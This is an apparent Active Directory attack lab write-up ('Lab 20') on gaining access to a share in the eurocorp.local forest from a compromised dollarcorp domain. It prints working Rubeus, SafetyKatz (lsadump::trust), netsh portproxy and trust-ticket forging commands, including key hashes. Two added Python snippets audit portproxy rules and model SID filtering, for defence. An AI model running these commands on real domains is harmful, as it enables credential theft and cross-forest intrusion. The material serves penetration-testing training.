Lab 20

With DA privileges on dollarcorp.moneycorp.local, get access to the SharedwithDCorp share on the DC of the eurocorp.local forest.

We need the trust key shared between dcorp (dollarcorp.moneycorp.local) and ecorp (eurocorp.local).

Let's start the process with DA privileges: obtain a TGT for svcadmin, copy Loader.exe to dcorp-dc and set up port forwarding on dcorp-dc so Loader can fetch its payload from the student VM.

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

# On student: Argsplit for "lsadump::trust"
# On svcadmin:
C:\Users\svcadmin> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
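A netsh portproxy rule like the one above persists on the DC until it is removed, which makes it a cheap thing for a defender to audit. The following is an added example (not part of the lab or of any tool the lab uses) that parses the output of `netsh interface portproxy show v4tov4` and flags every rule that is not on an explicit allowlist; the sample output is constructed to mirror the rule created on dcorp-dc, and the allowlist contents are an assumption.

```python
"""Audit netsh portproxy rules from 'netsh interface portproxy show v4tov4' output.

Added defender-side example; the sample output below is constructed and not
captured from the lab environment.
"""

# Constructed sample of what netsh prints after the rule from the lab is added.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        172.16.100.72   80
"""


def parse_portproxy(text):
    """Return a list of rule dicts parsed from netsh portproxy output.

    A data row has exactly four whitespace-separated fields and the second and
    fourth fields are numeric ports; the header and separator rows are skipped
    because they fail that test.
    """
    rules = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or not (fields[1].isdigit() and fields[3].isdigit()):
            continue
        rules.append(
            {
                "listen_addr": fields[0],
                "listen_port": int(fields[1]),
                "connect_addr": fields[2],
                "connect_port": int(fields[3]),
            }
        )
    return rules


def flag_unexpected_rules(rules, allowlist=frozenset()):
    """Return rules that are not in the allowlist.

    allowlist holds (listen_addr, listen_port, connect_addr, connect_port)
    tuples for forwarding rules an administrator deliberately configured
    (assumption: on a domain controller that set is normally empty).
    """
    return [
        r
        for r in rules
        if (r["listen_addr"], r["listen_port"], r["connect_addr"], r["connect_port"])
        not in allowlist
    ]


if __name__ == "__main__":
    for rule in flag_unexpected_rules(parse_portproxy(SAMPLE_NETSH_OUTPUT)):
        print(
            f"unexpected portproxy rule: {rule['listen_addr']}:{rule['listen_port']}"
            f" -> {rule['connect_addr']}:{rule['connect_port']}"
        )
```

On a real host the text would come from running the netsh command (or from the PortProxy registry values that back it); the parser is deliberately strict so that header rows never produce false rules.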

Using the trust key, we can now forge the inter-realm TGT (trust ticket). SID History is not injected here because SID filtering on the forest trust would strip it.

# Argsplit silver
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:142b07ad5c09b715a883c5014044421d /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /nowrap
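To see why SID History is not worth injecting across this trust, the following added example (not part of the lab or of Rubeus) models the SID filtering a trusting forest applies to the extra SIDs carried in a ticket arriving over a forest trust: only SIDs whose domain part belongs to the trusted forest's domains survive, everything else is dropped. The dollarcorp domain SID is the one from the lab; the eurocorp domain SID is a placeholder, and the rule set is a simplification of the real filtering logic (assumption: only the "not from the trusted forest" rule is modelled).

```python
"""Simplified model of SID filtering on an inbound forest trust.

Added example, not lab material. Models only the core rule: SIDs that do not
belong to a domain of the trusted forest are removed from the PAC extra SIDs.
"""

# Domain SID of dollarcorp.moneycorp.local, taken from the lab.
DCORP_DOMAIN_SID = "S-1-5-21-719815819-3726368948-3917688648"
# Placeholder for the eurocorp.local domain SID (constructed, not the real value).
ECORP_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"

# Domains the trusting forest (eurocorp) considers part of the trusted forest.
TRUSTED_FOREST_DOMAINS = frozenset({DCORP_DOMAIN_SID})


def domain_of(sid):
    """Return the S-1-5-21-x-y-z domain prefix of a domain SID, or None.

    Non-domain SIDs such as BUILTIN (S-1-5-32-...) or well-known SIDs return
    None, so they are never treated as belonging to the trusted forest.
    """
    parts = sid.split("-")
    if len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"]:
        return None
    return "-".join(parts[:7])


def rid_of(sid):
    """Return the relative identifier (last component) of a SID."""
    return int(sid.rsplit("-", 1)[1])


def filter_extra_sids(extra_sids, trusted_forest_domains=TRUSTED_FOREST_DOMAINS):
    """Apply SID filtering to the extra SIDs of a cross-forest ticket.

    Returns (kept, dropped). A SID is kept only when its domain prefix is one
    of the trusted forest's domain SIDs; a SID from the trusting forest itself
    (e.g. eurocorp Enterprise Admins) or from anywhere else is dropped.
    """
    kept, dropped = [], []
    for sid in extra_sids:
        if domain_of(sid) in trusted_forest_domains:
            kept.append(sid)
        else:
            dropped.append(sid)
    return kept, dropped


if __name__ == "__main__":
    # Constructed ticket extra SIDs: a dollarcorp account, eurocorp Enterprise
    # Admins (RID 519) and BUILTIN\Administrators (S-1-5-32-544).
    sample = [f"{DCORP_DOMAIN_SID}-1105", f"{ECORP_DOMAIN_SID}-519", "S-1-5-32-544"]
    kept, dropped = filter_extra_sids(sample)
    print("kept:   ", kept)
    print("dropped:", dropped)
```

The model shows the defensive property the lab relies on: a forged ticket crossing a filtered forest trust can only carry identities of the forest it came from, which is why the lab authenticates as a dollarcorp principal and relies on whatever access that principal has been granted on the share.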

Copy the base64 inter-realm TGT and use Rubeus to request a TGS for the CIFS service on eurocorp-dc and inject it.

C:\AD\Tools\Rubeus.exe asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGFjCCBhKgAwIBBaEDAgEWooIE4jCCBN5hggTaMIIE1qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa.....

Since the TGS is now imported, we can access the shared folder on eurocorp-dc.

C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
